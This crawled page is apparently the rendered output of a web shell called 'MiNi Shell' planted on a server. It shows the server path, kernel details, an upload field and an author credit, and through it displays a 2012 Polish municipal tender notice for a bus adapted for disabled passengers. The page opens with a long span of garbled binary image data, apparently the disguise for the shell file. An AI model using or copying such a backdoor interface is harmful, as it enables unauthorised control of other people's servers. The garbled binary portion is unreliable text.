JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120104/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120104/4754-N-2012.html

<p class="kh_header"><b>Otmuchów: Dostawa autobusu przeznaczonego do przewozu osób niepełnosprawnych.</b><br>
<b>Numer ogłoszenia: 4754 - 2012; data zamieszczenia: 04.01.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Otmuchów , ul. Zamkowa 6, 48-385 Otmuchów, woj. opolskie, tel. 077 4315016, faks 077 4315017.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.otmuchow.probip.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa autobusu przeznaczonego do przewozu osób niepełnosprawnych..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Autobus musi spełniać wymagania zgodnie  ustawą z dnia 20 czerwca 1997r. Prawo o Ruchu Drogowym (t.j. Dz. U. z 2005r. Nr 108, poz. 908), Rozporządzenia Ministra Infrastruktury z dnia 24 października 2005r. w sprawie homologacji typu pojazdów samochodowych i przyczep (Dz.U. z 205r. Nr 238, poz. 2010 z poźn. zm.) oraz Rozporządzenia Ministra Infrastruktury z dnia 31 grudnia 2002r. w sprawie warunków technicznych pojazdów oraz zakresu ich niezbędnego wyposażenia (Dz.U. z 2003r. Nr 32, poz. 262 z późn. zm.).Autobus: liczba miejsc siedzących dla pasażerów: nie mniej niż  19.Kolor biały.I. Przystosowanie  pojazdu do przewozu osób niepełnosprawnych.Zamontowanie szyn podłogowych do mocowania wózka inwalidzkiego, zamontowanie dodatkowych kierunkowskazów w tylnych narożnikach dachu pojazdu, oznakowanie pojazdu z przodu i z tyłu symbolem -inwalidzi. wyposażenie pojazdu w komplet pasów bezpieczeństwa  do mocowania wózków inwalidzkich do szyn, wyposażenie pojazdu w pasy biodrowe zabezpieczające osobę niepełnosprawną w wózku inwalidzkim, przystosowanie trzech foteli do łatwego demontażu, zamontowanie pomostu aluminiowego wraz z wciągarką w celu ułatwienia wprowadzenia osoby niepełnosprawnej na wózku inwalidzkim przez tylne drzwi do pojazdu.II. Warunki techniczne:Silnik:  Wysokoprężny 4. cylindrowy, 16. zaworowy z elektronicznym wtryskiem bezpośrednim typu Common Rail o pojemności skokowej powyżej 2.500 ccm, o mocy powyżej 150 KM,  spełniający normę emisji substancji szkodliwych min. EURO 4.Skrzynia biegów manualna sześciobiegowa (tj. 6. biegów do przodu i 1. wstecz). Zawieszenie oś przednia : niezależne, oś tylna : sztywna, koła tylne bliźniacze ( podwójne)układ kierowniczy: wspomagany, blokada koła kierownicy.Układ elektryczny: napięcie znamionowe 12 V, alternator 1540 W, akumulator 2V-110Ah.Układ hamulcowy: system zapobiegający blokowaniu kół, układ przeciwpoślizgowy napędu, elektroniczny korektor siły hamowania.Masa całkowita: do 6.500 kg.III.Wyposażenie minimalne:1. układ ABS - zapobiegający blokowaniu kół podczas hamownia,2. układ EBD - podziału siły hamowania pomiędzy osiami,3. układ ROM - zapobiegający przewróceniu pojazdu, 4. układ RMI  - zapobiegający utracie stabilności pojazdu,5.  układ ESP - stabilizujący tor jazdy pojazdu oraz przeciwdziałający wynoszeniu pojazdu na zakrętach, 6.układ ASR - zapobiegający poślizgowi kół podczas ruszania na śliskiej nawierzchni, 7. blokada tylnego mostu,8.tachograf cyfrowy,9.tempomat,10. centralny zamek,11. immobiliser w kluczyku,12. komputer pokładowy,13. obrotomierz 14. elektryczne otwierane szyby, 15. regulowane wysokość świateł z kabiny kierowcy,16. wentylator nawiewno-wywiewnego w tylnej części dachu pojazdu,17. klimatyzacja z dystrybutorem WEBASTO  (parownik umieszczony na dachu pojazdu, o  mocy nie niższej niż 10,5 kW) z nawiewem indywidualnym dla każdego rzędu  siedzeń  (wylot powietrza wraz z lampką), sterowanie elektroniczne, 18. zestaw audio: radioodtwarzacz CD-MP3, RDS 4. głośniki, 19. półki bagażowe,20. niezależne od pracy silnika ogrzewania z dwupunktowym rozprowadzeniem, 21. poduszka powietrzna kierowcy, 22. tapicerka materiałowa, 23. fotel kierowcy regulowany w trzech płaszczyznach, 24. bezwładnościowe pasy bezpieczeństwa,25. wlew paliwa zamykany na klucz,26. podgrzewany filtr paliwa,27. koło zapasowe pełnowymiarowe, 28. komplet kluczy - fabryczny, 29. kliny pod koła, 30. podnośnik hydrauliczny, 31. gaśnica min. 2kg.
IV.Nadwozie: 1. wysokość wewnętrzna pojazdu po zabudowie min. 2 m. 2.   przeszklenie przedziału pasażerskiego oprócz drzwi tylnych - szyby pojedyncze  wklejane do nadwozia, panoramiczne, 3. izolacja dźwiękowo-termiczna przedziału pasażerskiego, 4.pokrycie ścian, sufitu, słupków bocznych oraz tylnych drzwi tapicerką miękką, 5. wzmocniona podłoga sklejką wodoodporną z zabezpieczeniem antykorozyjnym pokryta wykładziną antypoślizgową, 6.wybijaki szyb samochodowych, zamontowane na słupkach bocznych + oznaczenie  wyjścia awaryjnego (4 szt.), 7. zamontowanie 19 - szt. foteli typu ekolider z zintegrowanymi zagłówkami, z regulacją  oparcia, fotele w pierwszym rzędzie i środkowy w ostatnim z 3 pkt. pasami  bezpieczeństwa, reszta foteli wyposażona w biodrowe pasy bezpieczeństwa, (fotele wyposażone w siatkę   bagażową z wyłączeniem ostatniego rzędu) i uchwyt z boku fotela od strony przejścia, 8.fotele w dwóch ostatnich rzędach zamontowane na podeście stanowiącym jednocześnie  miejsce na bagaż z dostępem od tyłu pojazdu, 9. 1/3 przegrody za fotelem kierowcy, 10. wieszaki ubraniowe zamontowane na słupkach bocznych, 11. poręcz zabezpieczająca znajdująca się przed fotelem zamontowanym przy drzwiach wejściowych, 12. uchwyt ułatwiający wsiadanie, zamontowany przy drzwiach wejściowych, 13. zasłonki przeciwsłoneczne w oknach,14. lusterko wewnętrzne, 15. obniżenie stopnia bocznego wejściowego,16. mechaniczne drzwi wejściowe po stronie pasażera z obniżonym stopniem,17. dodatkowe drzwi mechaniczne dla kierowcy, 18. luk dachowy w centralnej części dachu pojazdu, spełniający rolę wyjścia awaryjnego, 19. drzwi tylne awaryjne.V.  Oświetlenie:1. dodatkowe 3. Punkty oświetlenia przedziału pasażerskiego, 2.oświetlenie z funkcją do jazdy nocnej,3.oświetlenie stopnia bocznego - wejściowego.VI.  Oferowany  autobus musi być fabrycznie nowy.
VII. Wyżej wymienione parametry stanowią minimalne wymagania Zamawiającego. Preferowany autobus może posiadać parametry lepsze bądź równoważne.
VIII.  Wykonawca wyda pojazd wraz z pełną dokumentacją sporządzoną w języku polskim (zgodnie z obowiązującymi w tym zakresie przepisami). IX.  Ubezpieczenie OC, AC, NW na pojazd Zamawiający zawrze we własnym zakresie po jego dostarczeniu.X. Zamawiający wymaga zaoferowanie minimum 36 miesięcznej gwarancji określając oddzielnie okresy gwarancji na :1.silnik i podzespoły mechaniczne,2.perforację nadwozia XI.W okresie gwarancyjnym wykonawca zapewni 1.sprawne działanie autobusu 2. naprawę autobusu u użytkownika, a w przypadku braku takiej możliwości Wykonawca winien zapewnić doprowadzenie autobusu do stacji serwisowej oraz jego odbiór i  doprowadzenie z miejsca naprawy do użytkownika. Czynności te dokonywane będą na koszt Wykonawcy.3.  w przypadku powiadomienia Wykonawcy przez użytkownika autobusu o stwierdzeniu  usterki lub awarii w pracy autobusu Wykonawca zobowiązany jest w terminie 1 dnia 
roboczego licząc od dnia zgłoszenia do przystąpienia do naprawy.4.naprawa autobusu nie może trwać dłużej niż 14 dni od dnia zawiadomienia Wykonawcy o stwierdzeniu usterki lub awarii w pracy autobusu.XII. W okresie naprawy autobusu Wykonawca zobowiązany jest do podstawienia na swój  koszt autobusu zastępczego. Gmina ma prawo podjąć decyzję o podstawieniu autobusu  zastępczego we własnym zakresie i obciążyć kosztami z tym związanymi Wykonawcę.Wykonawca zapewnia Zamawiającemu wykonywanie przeglądów gwarancyjnych  i pogwarancyjnych, serwisu oraz innych usług związanych z eksploatacją pojazdu  w autoryzowanej stacji obsługi na terenie województwa opolskiego oraz dostawy części zamiennych.Okres gwarancji ulega przedłużeniu o czas, w którym Zamawiający nie mógł z autobusu korzystać.XIII. Do ofert należy dołączyć fotografie albo rysunki przedstawiające wygląd zewnętrzny oferowanego modelu pojazdu oraz wygląd wewnętrzny. XIV. Odbiór autobusu nastąpi w siedzibie Sprzedającego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 34.12.10.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.03.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.Każdy wykonawca winien jest wnieść wadium o wartości  -  6.000,00 zł (sześć tysięcy  złotych). 2.Wadium może być wnoszone w jednej lub kilku następujących  formach:pieniądzu, poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,gwarancjach bankowych, gwarancjach ubezpieczeniowych, 
poręczeniach udzielanych przez podmioty, o których mowa w art.6b ust.5 pkt.2 ustawy z dnia 9 listopada 2000 r. o otworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr 109, poz.1158 z późniejszymi zmianami) 3.Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Zamawiającego:  BS Otmuchów 37 8872 0003 0000 0260 2000 0040.4.	Wadium wnosi się przed upływem terminu składania ofert.5.	Dowód wniesienia wadium  należy dołączyć do oferty.6.Wykonawca zobowiązany jest podać nr rachunku bankowego na które ma nastąpić zwrot wadium.7.Zwrot wadium zgodnie z art. 46 ustawy  pzp.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w postępowaniu, dokonana zostanie wg formuły spełnia - nie spełnia. Zamawiający dokona oceny spełniania warunku na podstawie złożonych oświadczeń.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w postępowaniu, dokonana zostanie wg formuły spełnia - nie spełnia. Zamawiający dokona oceny spełniania warunku na podstawie złożonych oświadczeń.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w postępowaniu, dokonana zostanie wg formuły spełnia - nie spełnia. Zamawiający dokona oceny spełniania warunku na podstawie złożonych oświadczeń.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w postępowaniu, dokonana zostanie wg formuły spełnia - nie spełnia. Zamawiający dokona oceny spełniania warunku na podstawie złożonych oświadczeń.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełniania warunków udziału w postępowaniu, dokonana zostanie wg formuły spełnia - nie spełnia. Zamawiający dokona oceny spełniania warunku na podstawie złożonych oświadczeń.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie</li>

</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Dowód wniesienia wadium</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.otmuchow.probip.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski Otmuchów ul. Zamkowa 6; pokój nr 1  (parter)..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.01.2012 godzina 09:00, miejsce: Urząd Miejski Otmuchów ul. Zamkowa 6; sekretariat Burmistrza Otmuchowa pok. nr 11 
( I piętro)..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com